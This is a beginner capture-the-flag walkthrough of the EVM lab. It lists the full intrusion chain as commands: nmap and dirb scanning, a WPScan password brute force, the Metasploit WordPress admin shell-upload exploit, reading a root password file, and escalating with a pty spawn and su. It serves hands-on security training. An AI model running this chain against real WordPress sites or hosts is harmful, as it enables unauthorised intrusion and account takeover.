In this article, we will solve EVM lab. This
lab is designed by Ic0de and it is an easy lab as the author has intended it
beginners. You can download the lab from here.
Penetration
Methodologies:
·
Network Scanning
o
Netdiscover
o
Nmap
Scan
·
Enumeration
o
Browsing
HTTP Service
o
Directory
Bruteforce using dirb
o
Enumeration
Using WPScan
o
Password
Bruteforce using WPScan
o
Getting
Login Credentials
·
Exploitation
o
Exploiting
using Metasploit
o
Getting
a reverse connection
o
Spawning
a TTY Shell
o
Enumeration
for Root Credentials
·
Privilege Escalation
o
Getting
Login Credentials
o
Logging
in as root
o
Reading
the Final Flag
Walkthrough
Network Scanning
First we will find the IP address of our target
machine and for that please use the following command as it helps to see all
the IP’s in an internal network:
netdiscover
As you can see from the above image, our target
IP is 192.168.1.103. Now that we know target IP, we can move on to
scanning our target so that step by step we can attack further and gain control
of the machine and scanning will help us to find an opening. We will scan with
the help of nmap and for that use the following command:
nmap -A 192.168.1.103
With the help of nmap we observed that port
number 22, 53, 80, 110, 139, 143, 445 are open with the services of SSH,
DNS, HTTP, POP3, NETBIOS, IMAP and NETBIOS respectively.
Enumeration
As port 80 is open, let us try and open the IP
in browser as shown in the image below:
The apache webpage opens which is normal except
for the fact that there was a comment saying “you can find me at /wordpress/
im vulnerable 😊 “
Now according to this comment, it means there
is a vulnerable directory called ‘wordpress’. So to confirm we used dirb
command which is:
dirb http://192.168.1.103/
And to no surprise, there is a directory called
‘wordpress’. Now this is wordpress, as the name suggests, we can use wpscan to
find more about it. And for this, type:
wpscan --url http://192.168.1.103/wordpress/ -e
at -e ap -e u
With this command, we
are telling the wpscan to enumerate(-e) all themes(at), all plugins(ap)
installed on the wordpress site. And finally all the users(u) that might be
logged in on the Wordpress Site.
As you can see in the image below, there is a
vulnerable plug in c0rrupt3d_brain where we can attack via bruteforce
and get a password to log in.
So, for our bruteforce, we will use rockyou
wordlist and to put it in action type:
wpscan
--url http://192.168.1.103/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
And when the bruteforce is successful, it will
give you the password i.e. 24992499; which is shown in the image below
too:
Exploitation
Now that we know username and password, we can
use an inbuilt wordpress exploit from Metasploit. Firstly, start Metasploit by
typing ‘msfconsole’ and the type the following command:
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.1.103
set targeturi /wordpress
asset username c0rrupt3d_brain
set password 24992499
exploit
So, once the exploit is running and attack is
successful, you can will have your meterpreter session. When you have the
meterpreter session, go to home by typing cd /home and check list of
things home has to offer by using ls command. There was only on folder
there named root3r and when you navigate yourself to that folder and
check the list of files with the same command you used before. Here, you will
find .root_password_ssh.txt file; upon reading this text file with cat
you will find the password of the root user just its shown in the image below:
cd /home
ls
cd root3r
ls
cat
.root_password_ssh.txt
Privilege Escalation
Now, we know that the password of the root user
is willy26. We can now switch our user to root and for this type:
shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’
su root
willy26
Now, you are logged in as root along with its
privileges too. As you can see in the image below:
One you are logged in as a root user, navigate
yourself around and go to the root folder by typing cd /root. And there when
you will use ls command, you find a proof.txt document. Upon reading it with
cat command, it will show you that you have successfully pwned the machine.
YAY!!!!!!
0 comments:
Post a Comment